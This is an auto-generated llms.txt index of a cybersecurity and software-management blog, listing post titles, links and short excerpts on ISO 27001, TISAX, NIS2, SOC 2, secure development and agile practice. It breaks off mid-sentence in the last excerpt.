Generated by All in One SEO v5.0.0.1, this is an llms.txt file, used by LLMs to index the site. # Sorin Mustaca - Security & Technology Cybersecurity, AI, Automotive Security, Antimalware Software, Product Management, Agile, Secure Software Development, SSDLC ## Sitemaps - [XML Sitemap](https://www.sorinmustaca.com/sitemap.xml): Contains all public & indexable URLs for this website. ## Posts - [ISA VDA 6.0.3 - The Data Protection sheet explained](https://www.sorinmustaca.com/isa-vda-6-0-3-the-data-protection-sheet-explained/) - The Data Protection catalog is the shortest of the three in ISA 6.0.3 and the one most often underestimated. Twelve control questions across eight subchapters, all numbered under chapter 9. Compared to the roughly sixty questions in Information Security, it looks like an afterthought. It isn't. It is the part of the assessment where an - [Why SSDLC is helping shipping faster and more secure code](https://www.sorinmustaca.com/why-ssdlc-is-helping-shipping-faster-and-more-secure-code/) - Software Delivered the Same Way Every Time Before security enters the picture, SDLC exists to solve a simpler problem: making software delivery repeatable. A team that builds features ad hoc, without a defined sequence of requirements, design, coding, testing, and release, ends up with wildly inconsistent outcomes — some releases solid, others full of regressions, - [Security User Stories How-To - for product managers and developers](https://www.sorinmustaca.com/security-user-stories-how-to-for-product-managers-and-developers/) - I wrote some time ago about "How to create security user stories" and I received in the meanwhile a lot of good feedback and questions about it. For these reasons, I decided that it is time to write again on the topic, this time with focus on two importat groups in any software developer team: - [ISA VDA 6.0.3 (part 2) — Information Security Sheet: IS Policies and Organization](https://www.sorinmustaca.com/isa-vda-6-0-3-part-2-information-security-sheet-is-policies-and-organization/) - This is the part 2 of the series about the TISAX label: TISAX getting started: A Deep Dive into the ISA Assessment Workbook (part 1). ISA VDA 6.0.3 (part 2) — Information Security Sheet: IS Policies and Organization Chapter 1 — IS Policies and Organization This chapter establishes the governance foundation of the - [ISA VDA 6.0.3 (part 4) — Information Security Sheet: IT Security / Cyber Security](https://www.sorinmustaca.com/isa-vda-6-0-3-part-4-information-security-sheet-it-security-cyber-security/) - This is the part 4 of the series about the TISAX label: TISAX getting started: A Deep Dive into the ISA Assessment Workbook (part 1). ISA VDA 6.0.3 (part 4) — Information Security Sheet: IT Security / Cyber Security Chapter 5 — IT Security / Cyber Security This is the largest chapter in the Information - [ISA VDA 6.0.3 (part 5) — Information Security Sheet: Supplier Relationships, Compliance](https://www.sorinmustaca.com/isa-vda-6-0-3-part-5-information-security-sheet-supplier-relationships-compliance/) - This is the part 5 of the series about the TISAX label: TISAX getting started: A Deep Dive into the ISA Assessment Workbook (part 1). ISA VDA 6.0.3 (part 5) — Information Security Sheet: Supplier Relationships, Compliance Chapter 6 — Supplier Relationships This chapter addresses how the organization manages information security risks arising - [ISA VDA 6.0.3 (part 3) — Information Security Sheet: Human Resources, Physical Security, Identity and Access Management](https://www.sorinmustaca.com/isa-vda-6-0-3-part-3-information-security-sheet-human-resources-physical-security-identity-and-access-management/) - This is the part 3 of the series about the TISAX label: TISAX getting started: A Deep Dive into the ISA Assessment Workbook (part 1). ISA VDA 6.0.3 (part 3) — Information Security Sheet: Human Resources, Physical Security, Identity and Access Management Chapter 2 — Human Resources This chapter addresses the people dimension of - [Implementing ISO 27001:2022 Annex A.16 - Information Security Incident Management](https://www.sorinmustaca.com/implementing-iso-27001-2022-annex-a-16-information-security-incident-management/) - We started the ISO 27001:2022 series with the promise of explaining how the 14 categories of controls can be implemented. Today we address ISO 27001:2022 Annex A.16, "Information Security Incident Management" is crucial for organizations to effectively detect, respond to, and recover from security incidents. This annex provides guidelines for establishing an incident management process to minimize the - [Understanding ISO 27001:2022 Annex A.8 - Asset Management](https://www.sorinmustaca.com/understanding-iso-27001-2022-annex-a-8-asset-management/) - ISO 27001:2022 Annex A.8, "Asset Management," addresses the importance of identifying, classifying, and managing information assets within an organization. This annex emphasizes the need for organizations to establish processes for inventorying assets, assessing their value, and implementing appropriate controls to protect them. In this technical educational article, we'll explore how to implement Annex A.8 - [Understanding ISO 27001:2022 Annex A.14 - System Acquisition, Development, and Maintenance](https://www.sorinmustaca.com/understanding-iso-270012022-annex-a-14-system-acquisition-development-and-maintenance/) - We started the ISO 27001:2022 series with the promise of explaining how the 14 categories of controls can be implemented. Today we address ISO 27001:2022 Annex A.14, "System Acquisition, Development, and Maintenance", which addresses the importance of ensuring the security of information systems throughout their lifecycle, from acquisition and development to maintenance and disposal. This annex provides - [TISAX getting started: A Deep Dive into the ISA Assessment Workbook (part 1)](https://www.sorinmustaca.com/tisax-getting-started-a-deep-dive-into-the-isa-assessment-workbook-part-1/) - TISAX — the Trusted Information Security Assessment Exchange — or Trusted ISA Exchange - is the automotive industry's answer to a decades-old problem: every OEM was running its own supplier security questionnaire, and tier-1 and tier-2 suppliers were drowning in redundant audits. ENX Association, backed by the VDA (Verband der Automobilindustrie), formalized the exchange - [AI Security Best Practices for technical and non-technical people](https://www.sorinmustaca.com/ai-security-best-practices-for-technical-and-non-technical-people/) - AI Security Best Practices: What Every Employee Needs to Know A summary of an AI Security Policy — covering the risks that matter, with real examples of what goes wrong when they are ignored. AI tools are now part of everyday work — writing, coding, summarizing, automating. That is not going to change. But most - [AI Adoption for companies in the USA](https://www.sorinmustaca.com/ai-adoption-for-companies-in-the-usa/) - This is the extension of the original article AI Adoption for companies (based on OECD data) What US Companies Are Actually Spending — And Where It Maps The OECD data gives you the strategic framework. US-specific data gives you a reality check on spending. Here is what verified US sources report. Adoption in the - [AI Adoption for companies (based on OECD data)](https://www.sorinmustaca.com/ai-adoption-for-companies-based-on-oecd-data/) - Why You Need to Read This Now Between 2020 and 2024, the share of firms using AI across OECD countries more than doubled — from 5.6% to 14%. Large firms (250+ employees) are at 40% adoption. Small firms (10–49 employees) are at 11.9%. Mid-sized firms sit in the middle at 20.4%. That gap is - [SOC 2 Type 2 mapping to Secure SDLC Requirements](https://www.sorinmustaca.com/soc-2-type-2-mapping-to-secure-sdlc-requirements/) - We started to talk about the SOC2 Type 2 certification and I feel that we neglected it a bit. I wrote a bit about SDLC, Secure SDLC in particular, but now it is time to bring them together. SOC 2 Type 2 and Secure SDLC — the big picture SOC 2 Type 2 evaluates whether - [The Importance of Implementing an Information Security Management System (ISMS)](https://www.sorinmustaca.com/the-importance-of-implementing-an-information-security-management-system-isms/) - In today's interconnected and data-driven business landscape, information has become one of the most valuable assets for companies. As organizations rely heavily on technology and digital platforms, protecting sensitive data from threats has become a critical concern. This is where an Information Security Management System (ISMS) plays a pivotal role. In this article, we will - [Implementing secure over-the-air (OTA) updates in embedded devices](https://www.sorinmustaca.com/implementing-secure-over-the-air-ota-updates-in-embedded-devices/) - This is a follow up article related to Secure Booting and Secure Flashing. It is the 5th article related to Strengthening the Security of Embedded Devices Implementing secure over-the-air (OTA) updates in embedded devices requires careful consideration of various security aspects. Here are some key steps to implement secure OTA updates: 1. Secure Communication Channel - [Executive summary: NIS2 Directive for the EU members (updated)](https://www.sorinmustaca.com/executive-summary-nis2-directive-for-the-eu-members/) - The NIS 2 Directive is a set of cybersecurity guidelines and requirements established by the European Union (EU) . It replaces and repeals the NIS Directive (Directive 2016/1148/EC) . The full name of the directive is “Directive (EU) 2022/2555 of the European Parliament and of the Council of 14 December 2022 on measures for a high common - [How-To: NIS2 EU Directive](https://www.sorinmustaca.com/how-to-nis2-eu-directive/) - The NIS2 Directive is a European Union legislative text on cybersecurity that supersedes the first NIS (Network and Information Security) Directive, adopted in July 2016. NIS vs. NIS2 While the first NIS (Network and Information Security) Directive increased the Member States’ cybersecurity capabilities, its implementation proved difficult, resulting in fragmentation at different levels across the - [NIS2: 1. Perform a gap analysis](https://www.sorinmustaca.com/nis2-1-perform-a-gap-analysis/) - We wrote here https://www.sorinmustaca.com/how-to-nis2-eu-directive/ that the first step in implementing NIS2 requirements is to perform a gap analysis. The most critical part when performing a gap analysis is to define upfront against which standard or security framework are you comparing the existing situation. It is usual when performing a gap analysis of security maturity - [NIS2: 2.Designate a responsible person or team](https://www.sorinmustaca.com/nis2-2-designate-a-responsible-person-or-team/) - We wrote here https://www.sorinmustaca.com/how-to-nis2-eu-directive/ that the second step in implementing NIS2 requirements is to designate a responsible person or team. Appointing an individual or a team responsible for overseeing the implementation of the NIS2 directive within your company is critical to ensure its success. NIS2 implementation and compliance is a project, and as any project must - [How to implement an Information Security Management System (ISMS)](https://www.sorinmustaca.com/how-to-implement-an-information-security-management-system-isms/) - We wrote here https://www.sorinmustaca.com/how-to-nis2-eu-directive/ that the 3rd step in implementing the requirements of the directive is to establish a cybersecurity framework. If you haven't read what a cybersecurity framework means, then you should read article: https://www.sorinmustaca.com/demystifying-cybersecurity-terms-policy-standard-procedure-controls-framework/ . An ISMS is typically based on the ISO 27001 standard, which provides a framework for establishing, implementing, maintaining, - [NIS2: 3.Establish a cybersecurity framework](https://www.sorinmustaca.com/nis2-3-establish-a-cybersecurity-framework/) - We wrote here https://www.sorinmustaca.com/how-to-nis2-eu-directive/ that the 3rd step in implementing the requirements of the directive is to establish a cybersecurity framework. If you haven't read what a cybersecurity framework means, then you should read article: https://www.sorinmustaca.com/demystifying-cybersecurity-terms-policy-standard-procedure-controls-framework/ . Establishing a cybersecurity framework is critically important for organizations of all sizes and types because it is - [NIS2: Perform a risk assessment](https://www.sorinmustaca.com/nis2-perform-a-risk-assessment/) - This is the fourth article from the series How-To: NIS2 EU Directive . One essential step in safeguarding an organization's sensitive information is to perform a cybersecurity risk assessment. This assessment is particularly crucial when the goal is to implement an Information Security Management System (ISMS). In this article, we will delve into the importance - [TISAX: new Catalogue ISA v6 available](https://www.sorinmustaca.com/tisax-new-catalogue-isa-v6-available/) - This post is more for me to quicker find the details. Source: ISA Version 6 Now Available · ENX Portal Here is a summary ISA 6: The latest version of the ISA catalogue, published in October 2023, with many changes and improvements to address the challenges and needs of the industry.Download here. Key changes in ISA - [The ISO 27000 family of protocols and their role in cybersecurity](https://www.sorinmustaca.com/the-iso-27000-family-of-protocols-and-their-role-in-cybersecurity/) - The ISO 27000 family of protocols works together synergistically to provide a holistic approach to information security management. The importance of these standards in cybersecurity cannot be overstated. By adopting the ISO 27000 family of protocols, organizations can strengthen their resilience against evolving cyber threats, enhance their regulatory compliance, and build trust with customers, partners, and regulators. These standards promote a risk-based approach to information security, enabling organizations to identify and mitigate potential risks proactively, rather than reactively. Overall, the ISO 27000 family of protocols plays a critical role in elevating cybersecurity practices and promoting a culture of security and resilience in organizations worldwide. - [ISO 27001:2022: chapter by chapter description](https://www.sorinmustaca.com/iso-270012022-chapter-by-chapter-description/) - I've been asked many times by customers, especially those in automotive industry, who deal with the TISAX certification, which is based on ISO 27001, if I can make them a summary of the ISO 27001 standard. It turns out that there has been a while since I read it, I think it was somewhere in - [Annex A of ISO 27001:2022 explained and tips to prepare for an audit](https://www.sorinmustaca.com/annex-a-of-iso-27001-2022-explained/) - We wrote in the previous article ISO 27001:2022: chapter by chapter description about ISO 27001:2022 Annex A. Annex A of ISO 27001:2022 is a vital component of the standard, outlining a comprehensive set of controls that organizations can implement to mitigate information security risks effectively. These controls cover a wide range of areas, including physical security, - [Understanding ISO 27001:2022 Annex A.5 - Information Security Policies](https://www.sorinmustaca.com/iso-27001-2022-annex-a-5/) - We started the ISO 27001:2022 series with the promise of explaining how the 14 categories of controls can be implemented. We start today with A.5. Information Security Policies. Importance of Information Security Policies Information security policies are crucial components of any organization's cybersecurity framework. They provide guidelines and principles for safeguarding sensitive information, - [Understanding ISO 27001:2022 Annex A.6 - Organization of Information Security](https://www.sorinmustaca.com/understanding-iso-27001-2022-annex-a-6/) - We started the ISO 27001:2022 series with the promise of explaining how the 14 categories of controls can be implemented. We start today with ISO 27001:2022 Annex A.6, "Organization of Information Security", which outlines requirements for establishing an effective management framework to govern information security within an organization. This annex emphasizes the importance of defining roles, responsibilities, - [Understanding ISO 27001:2022 Annex A.7 - Human Resource Security](https://www.sorinmustaca.com/understanding-iso-27001-2022-annex-a-7-human-resource-security/) - We started the ISO 27001:2022 series with the promise of explaining how the 14 categories of controls can be implemented. Today we address ISO 27001:2022 Annex A.7, "Human Resource Security". These controls address the critical role that personnel play in information security within an organization. This annex emphasizes the need for organizations to implement measures - [Understanding ISO 27001:2022 Annex A.9 - Access Control](https://www.sorinmustaca.com/understanding-iso-27001-2022-annex-a-9-access-control/) - We started the ISO 27001:2022 series with the promise of explaining how the 14 categories of controls can be implemented. Today we address ISO 27001:2022 Annex A.9, "Access Control". Access control is a fundamental component of information security management systems (ISMS). It provides guidelines for implementing controls to ensure that only authorized individuals have access to information - [Understanding ISO 27001:2022 Annex A.10 - Cryptography](https://www.sorinmustaca.com/understanding-iso-27001-2022-annex-a-10-cryptography/) - We started the ISO 27001:2022 series with the promise of explaining how the 14 categories of controls can be implemented. Today we address ISO 27001:2022 Annex A.10, "Cryptography", which plays a vital role in ensuring the confidentiality, integrity, and authenticity of sensitive information. This annex provides guidelines for implementing cryptographic controls to protect data assets from unauthorized access, - [Understanding ISO 27001:2022 Annex A.11 - Physical and Environmental Security](https://www.sorinmustaca.com/understanding-iso-27001-2022-annex-a-11-physical-and-environmental-security/) - We started the ISO 27001:2022 series with the promise of explaining how the 14 categories of controls can be implemented. Today we address ISO 27001:2022 Annex A.11, "Physical and Environmental Security", which addresses the importance of protecting physical assets, facilities, and infrastructure that house information systems and assets. This annex provides guidelines for implementing controls to safeguard - [Understanding ISO 27001:2022 Annex A.12 - Operations Security](https://www.sorinmustaca.com/understanding-iso-270012022-annex-a-12-operations-security/) - We started the ISO 27001:2022 series with the promise of explaining how the 14 categories of controls can be implemented. Today we address ISO 27001:2022 Annex A.12, "Operations Security", which focuses on ensuring secure operations of information systems and assets. This annex provides guidelines for implementing controls to manage day-to-day operations, protect against security incidents, and maintain the - [Understanding ISO 27001:2022 Annex A.13 - Communications Security](https://www.sorinmustaca.com/understanding-iso-27001-2022-annex-a-13-communications-security/) - We started the ISO 27001:2022 series with the promise of explaining how the 14 categories of controls can be implemented. Today we address ISO 27001:2022 Annex A.13, "Communications Security", which addresses the importance of securing information during its transmission over communication networks. This annex provides guidelines for implementing controls to protect the confidentiality, integrity, and availability of - [Implementing ISO 27001:2022 Annex A.15 - Supplier Relationships](https://www.sorinmustaca.com/implementing-iso-270012022-annex-a-15-supplier-relationships/) - We started the ISO 27001:2022 series with the promise of explaining how the 14 categories of controls can be implemented. Today we address ISO 27001:2022 Annex A.15, "Supplier Relationships", which is crucial for organizations in order to ensure the security of information assets shared with external suppliers. This annex provides guidelines for managing supplier relationships effectively to mitigate - [NIS-2: 10 common misconceptions about the regulation](https://www.sorinmustaca.com/nis-2-10-common-misconceptions-about-the-regulation/) - We wrote here about NIS2 and we will continue to add more content about it. Because we are getting closer to October 17th, many people are getting more and more nervous about NIS2. Despite its significance, there are numerous misconceptions and misinterpretations circulating about the scope and implications of this regulation. This article aims to - [Maping NIS2 requirements to the ISO 27001:2022 framework](https://www.sorinmustaca.com/maping-nis2-requirements-to-the-iso-270012022-framework/) - We described here the process needed to perform a gap analysis for NIS2, but we did not add the details on how to approach this. This article references on the ISO27001:2022 series, especially on the description of the Annex A controls. Make sure you are familiar with the ISO 27oo1:2022 requirements and the with the - [Introduction to CISA's Secure by Design Initiative](https://www.sorinmustaca.com/introduction-to-cisas-secure-by-design-initiative/) - What is Secure by Design? Secure by Design products are those where the security of the customers is a core business requirement, not just a technical feature. Secure by Design principles should be implemented during the design phase of a product’s development lifecycle to dramatically reduce the number of exploitable flaws before they are - [Understanding the SOC 2 Certification](https://www.sorinmustaca.com/understanding-the-soc-2-certification/) - Introduction SOC 2 (Service Organization Control 2) certification is a framework designed by the American Institute of CPAs (AICPA) to help organizations manage customer data based on five Trust Service Criteria: , confidentiality,processing integrity, availability, security and privacy. This certification is crucial for service organizations that store or process customer data in the cloud. Comparison - [ISO 27001:2022 and TISAX: overlaps and differences](https://www.sorinmustaca.com/iso-270012022-and-tisax-overlaps-and-differences/) - Introduction ISO 27001:2022 and TISAX VDA ISA 6.0 are two prominent standards in the realm of information security management, particularly within the automotive industry. While ISO 27001 provides a global framework for establishing, implementing, maintaining, and continually improving an information security management system (ISMS), TISAX (Trusted Information Security Assessment Exchange), based on the VDA ISA - [Understanding NIS2 and DORA: What executives need to know](https://www.sorinmustaca.com/understanding-nis2-and-dora-what-executives-need-to-know/) - These days businesses are subject to increasing regulatory scrutiny, particularly regarding cybersecurity and operational resilience. Two significant EU regulations, NIS2 (Network and Information Systems Directive 2) and DORA (Digital Operational Resilience Act), outline mandatory requirements for organizations. Failure to comply can result in severe penalties. It is essential for executives to understand how these regulations - [Comparing "Records of Processing Activities" (ROPA) and "Data Protection Impact Assessments" (DPIA) (with Podcast)](https://www.sorinmustaca.com/comparing-records-of-processing-activities-ropa-and-data-protection-impact-assessments-dpia/) - Understanding ROPA and DPIA: Key GDPR Concepts for Tech Companies Podcast of this article: Let's explore two essential components of GDPR compliance: Records of Processing Activities (ROPA) and Data Protection Impact Assessments (DPIA). ROPA provides a comprehensive overview of your data handling, while DPIA focuses on assessing and mitigating risks for specific, - [NIS2 Fulfillment through TISAX Assessment and ISA6](https://www.sorinmustaca.com/nis2-fulfillment-through-tisax-assessment-and-isa6/) - ENX has released an interesting article about how NIS2 requirements map to TISAX requirements. For this, there is a short introductory article called "TISAX and Cybersecurity in Industry – Expert Analysis Confirms NIS2 Coverage" and and a full article of 75 pages : https://enx.com/TISAX-NIS2-en.pdf An analysis conducted within ENX's expert working groups examined how well - [Comparing Annex A in ISO/IEC 27001:2013 vs. ISO/IEC 27001:2022](https://www.sorinmustaca.com/comparing-annex-a-in-iso-iec-270012013-vs-iso-iec-270012022/) - I wrote ages ago this article, where I compared briefly the Annex A in the two versions of the standard: https://www.sorinmustaca.com/annex-a-of-iso-27001-2022-explained/ But, I feel that there is still need to detail a bit the changes, especially that now more and more business are forced to re-audit for the newer standard. Overview of Annex A - [EU Cyber Resilience Act (CRA) - Overview](https://www.sorinmustaca.com/eu-cyber-resilience-act-cra-overview/) - What is the Cyber Resilience Act - CRA The Cyber Resilience Act is the first European regulation to set a mandatory minimum level of cyber security for all connected products available on the EU market - something that did not exist before. The CRA is a regulation from the European Union — formally Regulation (EU) 2024/2847 - [Evaluating Python libraries reputation and safety](https://www.sorinmustaca.com/evaluating-python-libraries-reputation-and-safety/) - Evaluating Python library safety comes down to a few key dimensions: Check the source and provenance PyPI page: Look at download counts, release history, and whether the project links to a real GitHub/GitLab repo. Author/org reputation: Libraries maintained by well-known companies (Google, Meta, Microsoft, Palantir) or established OSS orgs carry more trust than anonymous accounts. - [Software engineers, you're measuring the wrong things. Here's what actually matters.(Podcast)](https://www.sorinmustaca.com/software-engineers-youre-measuring-the-wrong-things-heres-what-actually-matters/) - What are you doing is wrong! Most engineering teams are tracking effort and calling it progress. Story points, commit frequency, PR cycle time, items from a Definitions of Done implemented or respected — these are process metrics dressed up as productivity metrics. They tell you how busy your team is. They tell you almost nothing - [From Idea to Proof of Concept to MVP: The Idea stage (1/3)](https://www.sorinmustaca.com/from-idea-to-proof-of-concept-to-mvp-the-idea-stage/) - This is a a developer focused guide in three parts to evolving code, architecture, and processes with the purpose of turning a raw concept into a usable product. This process is one of the hardest parts of software development. Teams often jump into implementation too early, or they build something polished before testing whether the - [From Idea to Proof of Concept to MVP: The POC stage (2/3)](https://www.sorinmustaca.com/from-idea-to-proof-of-concept-to-mvp-the-poc-stage-2-3/) - We continue the series of 3 articles with the second one, about the Proof of Concept (POC). Here is the first article in the series, From Idea to Proof of Concept to MVP: The Idea stage (1/3) . 2. The Proof of Concept (POC) The POC is where the team tests a specific risky assumption - [From Idea to Proof of Concept to MVP - 3 article series](https://www.sorinmustaca.com/from-idea-to-proof-of-concept-to-mvp-3-article-series/) - This is a a developer focused guide in three parts to evolving code, architecture, and processes with the purpose of turning a raw concept into a usable product. This process is one of the hardest parts of software development. Teams often jump into implementation too early, or they build something polished before testing whether the - [From Idea to Proof of Concept to MVP: The Minimum Viable Product - MVP (3/3)](https://www.sorinmustaca.com/from-idea-to-proof-of-concept-to-mvp-the-minimum-viable-product-mvp-3-3/) - We continue the series of 3 articles with the second one, about the Minimum Viable Product (MVP). Here is the first article in the series, From Idea to Proof of Concept to MVP: The Idea stage (1/3) and the second article, the From Idea to Proof of Concept to MVP: The POC stage (2/3) . 3. - [Scrum, Kanban, and Scrumban: A Practical Comparison for Developers (Podcast)](https://www.sorinmustaca.com/scrum-kanban-and-scrumban-a-practical-comparison-for-developers/) - If you work in software development, you are most probably using one of the well known Agile methodologies like Scrum, Kanban or Scrumban. But if you are using one of them, for example Scrum, and you feel that you need so When a software team considers moving from Scrum to Kanban or Scrumban, the biggest - [Delivering often in small increments with Scrum](https://www.sorinmustaca.com/delivering-often-in-small-increments-with-scrum/) - Agile software development, particularly using Scrum, has revolutionized the way software is built and delivered. At its core, Agile embraces iterative and incremental development, a stark contrast to traditional "waterfall" methodologies. The primary objective is to deliver working software frequently and in small increments, ensuring continuous feedback, adaptability, and rapid value delivery. However, we know - [Navigating AI Standards and Regulations](https://www.sorinmustaca.com/navigating-ai-standards-and-regulations/) - Note: This post is written with a lot of help from AI, used to summarize the standards mentioned below. Artificial intelligence (AI) is reshaping industries, but it also brings new risks. From security vulnerabilities to compliance challenges, organizations must balance innovation with responsibility. New standards were created and newer are emerging to guide this - [Policy vs Standard vs Procedure: why, what, how](https://www.sorinmustaca.com/policy-vs-standard-vs-procedure-why-what-how/) - Ever wondered what the differences between these terms are? We use them in GRC very often, but we rarely think what they mean. This creates in time some stretching of these concepts, meaning that their meanings overlap to a certain degree. A Policy is a high-level, mandatory statement of principles and intent. A Standard - [Guide for delivering frequently software features that matter (series) #2/2: Challenges and the path forward](https://www.sorinmustaca.com/guide-for-delivering-frequently-software-features-that-matter-series-2-2-challenges-and-the-path/) - Click below for the podcast version (AI generated): Challenges that stop teams to deliver and how to solve them Objection 1: "Our features are too complex for short sprints" This is the most common objection I hear, and it reveals a fundamental misunderstanding. The solution isn't longer sprints or more sprints — it's better feature - [Guide for delivering frequently software features that matter (series) #1/2: the Pillars of successful frequent delivery](https://www.sorinmustaca.com/guide-for-delivering-frequently-software-features-that-matter-series/) - Click below for the podcast version (AI generated): Guide for delivering frequently software features that matter: the three Pillars of successful frequent delivery If you're a software engineer older than 30 years, then you definitely have worked following a non-agile methodology. Those methodologies are based on a fixed structure, a lot of planning, and hope - [Time for demystifying "failure is the key to success"](https://www.sorinmustaca.com/time-for-demystifying-failure-is-the-key-to-success/) - Time for some other type of posts, not related to what I usually write about. But it bothers me to see so many "shiny" posts on Linkedin, when I know for sure that the reality is so much different than what they write there. So, time to demystify a bit this topic. This is a - [Beyond "Move Fast and Fail Fast": Balancing Speed, Security, and ... Sanity in Software Development (with Podcast)](https://www.sorinmustaca.com/beyond-move-fast-and-fail-fast-balancing-speed-security-and-sanity-in-software-development/) - Move fast and fail fast In software development, the mantra "move fast and fail fast" has become both a rallying cry and a source of considerable debate. It champions rapid iteration, prioritizing speed and output, often at the perceived expense of meticulous planning and architectural foresight. This approach, deeply intertwined with the principles of agile - [Project management with Scrum (with Podcast)](https://www.sorinmustaca.com/project-management-with-scrum/) - They can't mix, can they? Seems like a contradiction to talk about classical project management and the best agile software development methodology ? But let me ask you this: ever feel like traditional project management is great for mapping out the big picture but falls short when it comes to the nitty-gritty of execution? And - [AI vs. (secure) software developers](https://www.sorinmustaca.com/ai-vs-secure-software-developers/) - I think the entire software development world saw NVIDIA's CEO saying that the world will stop needing software developers, because they will be replaced by AI. Well, considering that this comes from the guy who sells the core on which AI is built, is understandable. But is there any truth to this? Let's look at - [Building Resilient Web Applications on AWS: A Comprehensive Approach to Security](https://www.sorinmustaca.com/building-resilient-web-applications-on-aws-a-comprehensive-approach-to-security/) - I have been asked by friends and customers what is the best way to implement a web based application with minimum costs and good security. Of course, the best way is to define exactly what you want to achieve and let professionals do it, while keeping an eye on the Secure Software Development Lifecycle. - [Understanding Defense in Depth in IT Security](https://www.sorinmustaca.com/understanding-defense-in-depth-in-it-security/) - The recent outage caused by Crowdstrike's faulty update has create a lot of discussions. I wrote a post on LinkedIn where I asked the readers why are IT professionals using Crowdstrike on some systems that shouldn't be in need of such protection in the first place. The answers in various groups were mostly related to: - [How-To create Security User Stories](https://www.sorinmustaca.com/how-to-create-security-user-stories/) - In the previous article, we explored how Scrum enables teams to add security to the backlog and prioritize it based on risk. Incorporating security into the SDLC ensures that security is not an afterthought but an integral part of the development process. Security User Stories are specific, actionable items that articulate the security needs of - [Accelerating feature delivery in software development](https://www.sorinmustaca.com/accelerating-feature-delivery-in-software-development/) - My company develops security products for all major operating systems. We work with startups and with big companies, all striving to develop features (functional and non-functional) as fast and as good as possible. While on the first view this seems like a contradiction, there are actually ways of implementing exactly this. For security software development - [Bitcoin fraud through (hacked?) Wordpress installations](https://www.sorinmustaca.com/bitcoin-fraud-through-hacked-wordpress-installations/) - I don't usually write anymore about phishing attempts, but this one draw my attention due to large amount of emails and to variety of websites being used. Of course, I would not write "massive" if I would have received 1-10, but I receive about 10 a day. Fortunately, almost all go to Spam folder. Gmail - [Delivering secure software in an agile way](https://www.sorinmustaca.com/delivering-secure-software-in-an-agile-way/) - Agile Software Development: Why It’s Better Traditional development methodologies, such as the Waterfall model, struggle to keep up with the need for quick iterations, frequent releases, and adaptability to changing requirements. Agile software development addresses these challenges by emphasizing flexibility, collaboration, and continuous delivery. Agile methodologies break down the development process into smaller, manageable - [The Automotive industry's inadequate approach towards software (in the cars)](https://www.sorinmustaca.com/the-automotive-industrys-inadequate-approach-towards-software-in-the-cars/) - Introduction The automotive industry has witnessed a paradigm shift with the increasing integration of software in vehicles. Modern cars are no longer just mechanical devices with a motor, wheels and steering; they are now sophisticated machines having dozens of CPUs (called ECU), entire computers, high speed network to connect them (called CAN-bus) and relying on - [Google Ads for Bitbucket.org - malvertising at its best (Updated)](https://www.sorinmustaca.com/google-ads-for-bitbucket-org-malvertising-at-its-best/) - What is it? Malvertising : Malware delivered through Advertising. These corrupted ads are designed to appear legitimate but they may serve malicious code, which can infect a user's device simply through viewing or clicking on the ad. Malvertising exploits the expansive reach and complex supply chains of online advertising networks, enabling attackers to deliver - [Implementing ISO 27001:2022 Annex A.18 - Compliance](https://www.sorinmustaca.com/implementing-iso-27001-2022-annex-a-18-compliance/) - We started the ISO 27001:2022 series with the promise of explaining how the 14 categories of controls can be implemented. Today we end the series with ISO 27001:2022 Annex A.18, "Compliance", which addresses the importance of ensuring that organizations comply with relevant laws, regulations, contractual agreements, and other requirements related to information security. This annex focuses - [Implementing ISO 27001:2022 Annex A.17 - Information Security Aspects of Business Continuity Management](https://www.sorinmustaca.com/implementing-iso-27001-2022-annex-a-17-information-security-aspects-of-business-continuity-management/) - We started the ISO 27001:2022 series with the promise of explaining how the 14 categories of controls can be implemented. Today we address ISO 27001:2022 Annex A.17, "Information Security Aspects of Business Continuity Management" is crucial for organizations to ensure the resilience of their information security management systems (ISMS) in the face of disruptive events. This annex - [How to Configure the Most Secure Settings for Microsoft Defender](https://www.sorinmustaca.com/how-to-configure-the-most-secure-settings-for-microsoft-defender/) - Q: write an article describing most secure settings of Microsoft Defender A: Microsoft Defender is a comprehensive security solution that protects your Windows devices from various threats, such as malware, ransomware, phishing, and more. Microsoft Defender includes several features and settings that you can customize to enhance your security and privacy. In this article, we - [Secure Booting for Embedded Devices: Safeguarding Systems from Intrusions](https://www.sorinmustaca.com/secure-booting-for-embedded-devices-safeguarding-systems-from-intrusions/) - This is the second article in the series about embedded devices security, started with Strengthening the Security of Embedded Devices Embedded devices are specialized computing systems designed to perform specific tasks or functions within a larger system. Unlike general-purpose computers, embedded devices are typically integrated into other devices or systems and are dedicated to carrying - [The Importance of Secure Flashing for Embedded Devices and Secure Implementation Practices](https://www.sorinmustaca.com/the-importance-of-secure-flashing-for-embedded-devices-and-secure-implementation-practices/) - This is the third article in the series about embedded devices security, started with Strengthening the Security of Embedded Devices The second article was Secure Booting for Embedded Devices: Safeguarding Systems from Intrusions In this article, we will explore the importance of secure flashing for embedded devices and discuss best practices for implementing secure firmware - [Risk Assessment of AWS services used in building a resilient Web App on AWS](https://www.sorinmustaca.com/risk-assessment-of-aws-services-used-in-building-a-resilient-web-app-on-aws/) - We wrote here in the article "Building Resilient Web Applications on AWS: A Comprehensive Approach to Security" how to use certain AWS services to implement a resilient web based application. The services mentioned require also a brief analysis in respect to Security, Confidentiality, Integrity, Availability and Privacy. CloudTrail AWS CloudTrail records API calls and creates - [Evolving beyond your core expertise: it's time to add security](https://www.sorinmustaca.com/evolving-beyond-your-core-expertise-its-time-to-add-security/) - This post is for creators of digital services like optimization tools, VPN solutions, Backup and Disaster Recovery tools, Parental control tools, Identity protection tools, Privacy tools, Email clients, Browsers and many others. Your products are doing a good job in the dynamic landscape of digital services, and it is amazing of how much commitment and - [Balancing functionality and privacy concerns in AI-based Endpoint Security solutions](https://www.sorinmustaca.com/balancing-functionality-and-privacy-concerns-in-ai-based-endpoint-security-solutions/) - The integration of Artificial Intelligence (AI) in endpoint security has revolutionized the way organizations protect their devices and data. Ok, let's take a break here: have you read the article about Artificial Intelligence vs. Machine Learning ? By leveraging AI and machine learning models that analyze user behavior on devices, organizations can detect anomalies - [ChatGPT and automotive cybersecurity #2/2: TISAX certification](https://www.sorinmustaca.com/chatgpt-and-automotive-cybersecurity-2-2-tisax-certification/) - This is the 2nd post about Automotive Cybersecurity. Since I am working these days on CSMS (based on ISO ECE 21434 and TISAX), part of my companies consulting offer for automotive I thought maybe I check what ChatGPT things about them. First post was about CSMS and ISO 21434 and this one is about - [The Importance of Training Employees in Cybersecurity](https://www.sorinmustaca.com/the-importance-of-training-employees-in-cybersecurity/) - In today's increasingly interconnected world, cyber threats pose a significant risk to businesses of all sizes. As technology advances, cybercriminals become more sophisticated, making it imperative for organizations to prioritize cybersecurity measures. While investing in robust infrastructure 